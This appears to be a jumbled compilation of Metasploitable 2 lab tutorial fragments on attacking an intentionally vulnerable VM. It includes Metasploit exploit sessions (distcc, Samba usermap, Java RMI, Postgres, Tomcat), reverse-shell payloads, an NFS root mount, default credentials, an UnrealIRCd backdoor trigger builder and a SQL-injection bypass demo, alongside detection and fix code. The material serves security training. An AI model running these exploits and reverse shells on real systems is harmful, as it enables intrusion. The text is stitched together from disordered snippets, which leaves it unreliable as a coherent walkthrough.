RPORT => 445

This is Metasploitable2 (Linux). Metasploitable is an intentionally vulnerable Linux virtual machine. This will provide us with a system to attack legally. Now you can do some post exploitation.

This version (UnrealIRCd 3.2.8.1, the IRC daemon shipped on Metasploitable 2) contains a backdoor that went unnoticed for months. It is triggered by sending the letters "AB" followed by a system command to the server on any listening port.

msf exploit(tomcat_mgr_deploy) > exploit
[*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp

Nessus, OpenVAS and Nexpose vs Metasploitable.

Getting started. Andrea Fortuna.

Additionally, three levels of hints are provided, ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (maximum hints). To access a particular web application, click on one of the links provided. Information about each OWASP vulnerability can be found under the menu on the left.

Let's see what that implies first: TCP Wrapper is a host-based network access control system used in operating systems such as Linux or BSD to filter network access to Internet Protocol (IP) servers.

Id Name
Exploit target:
[*] Sending backdoor command
[*] B: "VhuwDGXAoBmUMNcg\r\n"
[*] A is input
0 Automatic
root 2768 0.0 0.1 2092 620 ?

From the shell, run the ifconfig command to identify the IP address. To proceed, click the Next button.

This could allow more attacks against the database to be launched by an attacker.

For our first example we have toggled Hints to 1 and selected the A1 - Injection -> SQLi Bypass Authentication -> Login vulnerability. Trying the SQL injection method of entering OR 1=1 into the Name field, as described in the hints, gave the following errors. This turns out to be due to a minor, yet crucial, configuration problem that impacts any database related functionality.

How to Use Metasploit's Interface: msfconsole.
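The UnrealIRCd trigger described above, as an added example that is not part of the original page or of Metasploit: the daemon checks whether a received buffer starts with "AB" and then hands the whole buffer to system(), so a ';' separates the bogus "AB" command from the attacker's. The server side here is a stand-in that only records what would have reached system(), not the IRC daemon, and the sample traffic lines are constructed.

```python
# Added example (not from the original page): wire format of the UnrealIRCd
# 3.2.8.1 backdoor trigger, a stand-in for the daemon's check, and a simple
# detection rule for IRC traffic. Run stand-alone; no network access needed.
import socket

TRIGGER = b"AB"   # the magic bytes the backdoored daemon compares against


def build_trigger(command: str) -> bytes:
    """Bytes an attacker sends to any UnrealIRCd listener (e.g. TCP/6667).

    The daemon runs system() on the whole buffer, so "AB" fails as a
    command and the text after ';' runs as the injected command.
    """
    return TRIGGER + b";" + command.encode() + b"\n"


def backdoor_command(buffer: bytes):
    """Stand-in for the daemon's check (not UnrealIRCd code): return the
    string it would pass to system(), or None if the magic prefix is absent."""
    if buffer.startswith(TRIGGER):
        return buffer.decode(errors="replace")
    return None


def is_backdoor_trigger(line: bytes) -> bool:
    """Detection rule: no legitimate IRC client message starts with "AB;",
    so the prefix itself is the indicator to alert on."""
    return line.startswith(TRIGGER + b";")


def loopback_demo(command: str):
    """Send the trigger over a local socket pair and return what the
    stand-in server would have executed."""
    client, server = socket.socketpair()
    try:
        client.sendall(build_trigger(command))
        received = server.recv(4096)
    finally:
        client.close()
        server.close()
    return backdoor_command(received)


# Constructed sample of lines seen on port 6667: ordinary IRC registration
# and channel commands plus one backdoor trigger.
SAMPLE_TRAFFIC = [
    b"NICK scanner\r\n",
    b"USER scanner 0 * :scanner\r\n",
    build_trigger("id"),
    b"JOIN #test\r\n",
]


def flagged(lines):
    """Return only the lines the detection rule would alert on."""
    return [line for line in lines if is_backdoor_trigger(line)]


if __name__ == "__main__":
    print("stand-in server would run:", repr(loopback_demo("id")))
    print("flagged lines:", flagged(SAMPLE_TRAFFIC))
```

The detection function is the part worth keeping: a signature on the "AB;" prefix at the start of a client message is exactly the kind of check that would have caught the backdoor during the months it went unnoticed.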
XSS via logged in user name and signature
The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1
DOM injection on the add-key error message because the key entered is output into the error message without being encoded
You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value
You can SQL inject the UID cookie value because it is used to do a lookup
You can change your rank to admin by altering the UID value
HTTP Response Splitting via the logged in user name because it is used to create an HTTP header
This page is responsible for cache-control but fails to do so
This page allows the X-Powered-By HTTP header
HTML comments
There are secret pages that, if browsed to, will redirect the user to the phpinfo.php page

[*] Reading from sockets
RHOSTS => 192.168.127.154

What is Metasploit? This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems.

RHOST 192.168.127.154 yes The target address
msf exploit(drb_remote_codeexec) > exploit
[*] Command: echo 7Kx3j4QvoI7LOU5z;
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname
Name Current Setting Required Description

The first of these installed on Metasploitable 2 is distccd. In the next tutorial we'll use Metasploit to scan and detect vulnerabilities on this Metasploitable VM.

By default, msfconsole opens with a banner; to suppress it and start the interface in quiet mode, run msfconsole with the -q flag.

Type \c to clear the current input statement.

The same exploit that we used manually before was very simple and quick in Metasploit. This allows remote access to the host for convenience or remote administration.

This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.
[-] Exploit failed: Errno::EINVAL Invalid argument

192.168.56.0/24 is the default "host only" network in VirtualBox.

RHOSTS => 192.168.127.154
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

The compressed file is about 800 MB and can take a while to download over a slow connection. Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target.

LHOST yes The listen address

https://information.rapid7.com/download-metasploitable-2017.html

[*] A is input

Currently missing is documentation on the web server and web application flaws, as well as vulnerabilities that allow a local user to escalate to root privileges.

So, let's set it up:
mkdir /metafs    # this will be the mount point
mount -t nfs 192.168.127.154:/ /metafs -o nolock    # mount the remote export over NFS and disable file locking

Because the export is the root filesystem and is writable, a client that mounts it can read and modify any file on the target, including /root/.ssh/authorized_keys.

It's time to enumerate this database and collect as much information as you can to plan a better strategy.

msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

For example, noting that the version of PHP disclosed in the screenshot is 5.2.4, it may be that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311, which affected PHP before 5.3.12 and 5.4.x before 5.4.2.
VERBOSE true yes Whether to print output for all attempts

eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1
inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

root@ubuntu:~# nmap -p0-65535 192.168.99.131
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT

Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@ubuntu:~# showmount -e 192.168.99.131

Let's see if we can really connect without a password to the database as root.

Therefore, we'll stop here.

[*] Reading from sockets

Step 2: Basic Injection.

Set-up This .

[*] Command: echo D0Yvs2n6TnTUDmPF;

Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator.

Our first attempt failed to create a session. The following commands to update Metasploit to v6.0.22-dev were tried to see if they would resolve the issue. Unfortunately the same problem occurred after the version upgrade, which may have been down to the database needing to be re-initialized.

msf > use exploit/multi/http/tomcat_mgr_deploy
[*] A is input

Commands end with ; or \g.
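The authentication bypass explained above (closing the string with a single quote and adding OR), as an added example that is not code from the original page or from the web application it describes. It runs against an in-memory SQLite database so it works offline; the accounts table, its two rows and the shape of the login query are assumptions modelled on a typical PHP login form, while Metasploitable 2 itself uses MySQL.

```python
# Added example (not from the original page): the string-concatenated login
# query behind the SQLi authentication bypass, next to its parameterised fix.
# Table, rows and query shape are constructed for the demonstration.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a two-row accounts table, admin first."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (username TEXT, password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("admin", "adminpass", 1), ("bob", "bobpass", 0)],
    )
    return conn


def build_vulnerable_sql(username: str, password: str) -> str:
    """Builds the statement the way the vulnerable form does: user input is
    pasted straight into the quoted literals, so a quote in the input ends
    the literal and the rest of the input becomes SQL."""
    return (
        "SELECT username FROM accounts WHERE username='" + username
        + "' AND password='" + password + "'"
    )


def login_vulnerable(conn, username: str, password: str):
    """Return the user the vulnerable query logs in as, or None."""
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Parameterised query: the driver sends the values separately from the
    statement, so no input can change the WHERE clause."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Name field payload: the "-- " comment discards the password check.
    print(build_vulnerable_sql("' OR 1=1 -- ", "x"))
    print("vulnerable:", login_vulnerable(db, "' OR 1=1 -- ", "x"))
    # Password field payload: AND binds tighter than OR, so the OR wins.
    print("vulnerable:", login_vulnerable(db, "nobody", "' OR '1'='1"))
    print("fixed:", login_fixed(db, "' OR 1=1 -- ", "x"))
```

Both payloads return the first row of the table, which is why the bypass typically lands on the admin account: the injected condition matches every row and the application takes whichever comes back first.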
The nmap scan shows that the port is open but tcpwrapped. nmap reports a port as tcpwrapped when the TCP handshake completes but the service closes the connection before sending any data, which is how a libwrap-protected daemon behaves when it rejects the client under /etc/hosts.allow and /etc/hosts.deny.

The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

msf exploit(java_rmi_server) > exploit
Id Name
S /tmp/run
[*] Started reverse handler on 192.168.127.159:4444

Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to the target host, and generates a UDF (user-defined function) from that shared object.

Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'.

Name Current Setting Required Description
msf exploit(java_rmi_server) > set RHOST 192.168.127.154
Exploit target:
THREADS 1 yes The number of concurrent threads

Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux. Features of DVWA v1.0.7 accessible from the menu include:
A More Info section is included on each of the vulnerability pages, which contains links to additional resources about the vulnerability.

Proxies no Use a proxy chain
msf exploit(postgres_payload) > show options

After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. The applications are installed in Metasploitable 2 in the /var/www directory.

SESSION yes The session to run this module on.
RPORT 80 yes The target port
[*] Started reverse double handler

During that test we found a number of potential attack vectors on our Metasploitable 2 VM.

[*] Meterpreter session, using get_processes to find netlink pid
[*] Reading from socket B

Exploiting All Remote Vulnerabilities in Metasploitable 2.

Module options (auxiliary/scanner/postgres/postgres_login):

Step 2: Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2.
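The TCP Wrappers behaviour behind a "tcpwrapped" port, as an added example that is not code from the original page or from libwrap: a minimal evaluator for the /etc/hosts.allow and /etc/hosts.deny rules, applied in the order the real library uses (hosts.allow first, then hosts.deny, default allow). The two rule files are constructed, and only a subset of the hosts_access(5) syntax is handled (daemon lists, ALL, exact IPs, net/mask or CIDR networks, and a trailing-dot prefix); EXCEPT clauses, hostnames and the LOCAL keyword are left out.

```python
# Added example (not from the original page): evaluate constructed
# hosts.allow / hosts.deny rules the way TCP Wrappers (libwrap) does.
# A libwrap-aware daemon accepts the TCP connection, runs this check and,
# when the client is denied, closes the socket without a banner, which is
# what nmap reports as "tcpwrapped".
import ipaddress

# Constructed sample configuration (assumed, not Metasploitable's own files).
HOSTS_ALLOW = """
# comment lines and blank lines are ignored
sshd : 192.168.56.0/255.255.255.0
portmap, mountd : 192.168.56.
ALL : 127.0.0.1
"""

HOSTS_DENY = """
ALL : ALL
"""


def parse_rules(text):
    """Return a list of (daemons, clients) tuples from a hosts.* file."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        fields = [f.strip() for f in line.split(":")]
        if len(fields) < 2:
            continue                           # malformed line: ignored
        daemons = [d.strip() for d in fields[0].split(",")]
        clients = [c.strip() for c in fields[1].split(",")]
        rules.append((daemons, clients))
    return rules


def client_matches(pattern, client_ip):
    """Match one client pattern against a dotted-quad client address."""
    if pattern == "ALL":
        return True
    if "/" in pattern:                         # 192.168.56.0/255.255.255.0 or /24
        return ipaddress.ip_address(client_ip) in ipaddress.ip_network(
            pattern, strict=False
        )
    if pattern.endswith("."):                  # "192.168.56." prefix form
        return client_ip.startswith(pattern)
    return client_ip == pattern                # exact address


def rule_matches(rule, daemon, client_ip):
    daemons, clients = rule
    if daemon not in daemons and "ALL" not in daemons:
        return False
    return any(client_matches(p, client_ip) for p in clients)


def hosts_access(daemon, client_ip, allow_text=HOSTS_ALLOW, deny_text=HOSTS_DENY):
    """libwrap decision order: first allow match wins, then first deny
    match, and a client matching neither file is allowed."""
    if any(rule_matches(r, daemon, client_ip) for r in parse_rules(allow_text)):
        return "allow"
    if any(rule_matches(r, daemon, client_ip) for r in parse_rules(deny_text)):
        return "deny"
    return "allow"


if __name__ == "__main__":
    for daemon, ip in [("sshd", "192.168.56.1"), ("sshd", "10.0.0.5"),
                       ("vsftpd", "127.0.0.1"), ("vsftpd", "192.168.56.1")]:
        print(daemon, ip, "->", hosts_access(daemon, ip))
```

The last rule in the evaluator is the one scanners trip over: with "ALL : ALL" in hosts.deny, every daemon that links libwrap answers an unlisted scanner with a connect-then-close, so the port shows as open but tcpwrapped from the scanner's address while remaining fully usable from an allowed network.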
Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution.

[*] Accepted the first client connection
[*] Accepted the second client connection
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700

root@ubuntu:~# telnet 192.168.99.131 1524

msf exploit(distcc_exec) > set RHOST 192.168.99.131
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700
uid=1(daemon) gid=1(daemon) groups=1(daemon)

root@ubuntu:~# smbclient -L //192.168.99.131
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
print$ Disk Printer Drivers
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit

msf exploit(distcc_exec) > set LHOST 192.168.127.159
0 Generic (Java Payload)
RHOSTS => 192.168.127.154
RPORT 1099 yes The target port

Please check out the Pentesting Lab section within our Part 1 article for further details on the setup.

[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

We're going to exploit it and get a shell. Due to a random number generator vulnerability (the Debian OpenSSL bug, CVE-2008-0166, which left the process ID as the only entropy fed to the PRNG), keys generated by the OpenSSL software installed on the system come from a small, enumerable set and are susceptible to a brute-force attack.
This can be done via brute forcing
SQL injection and XSS via Referer HTTP header
SQL injection and XSS via User-Agent string
Authentication bypass SQL injection via the username field and password field
SQL injection via the username field and password field
XSS via username field
JavaScript validation bypass
This page gives away the PHP server configuration
Application path disclosure
Platform path disclosure
Creates cookies but does not make them HttpOnly

IP addresses are assigned starting from "101".

payload => linux/x86/meterpreter/reverse_tcp

[*] Writing to socket B
RHOST yes The target address
Module options (auxiliary/admin/http/tomcat_administration):

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.

To access official Ubuntu documentation, please visit:

Let's proceed with our exploitation.

"Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment."

It comes with a large database of exploits for a variety of platforms and can be used to test the security of systems and look for vulnerabilities.

CVE-2017-5231.

Setting 3 levels of hints from 0 (no hints) to 2 (maximum hints).

msf2 has an rsh-server running and allowing remote connectivity: the login service on TCP/513, alongside exec on TCP/512 and shell on TCP/514.

Step 9: Display all the columns fields in the .

As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions.
Name Current Setting Required Description
STOP_ON_SUCCESS => true
[*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically

If so, please share your comments below.

In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154.

Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit.

We chose to delve deeper into TCP/5900 - VNC and used the Metasploit framework to brute force our way in with what ended up being a very weak .

Module options (exploit/linux/misc/drb_remote_codeexec):
Name Current Setting Required Description

To make this step easier, both Nessus and Rapid7 Nexpose scanners are used to locate potential vulnerabilities for each service.

Cross site scripting on the host/ip field
O/S Command injection on the host/ip field
This page writes to the log.

0 Automatic
msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154
Name Current Setting Required Description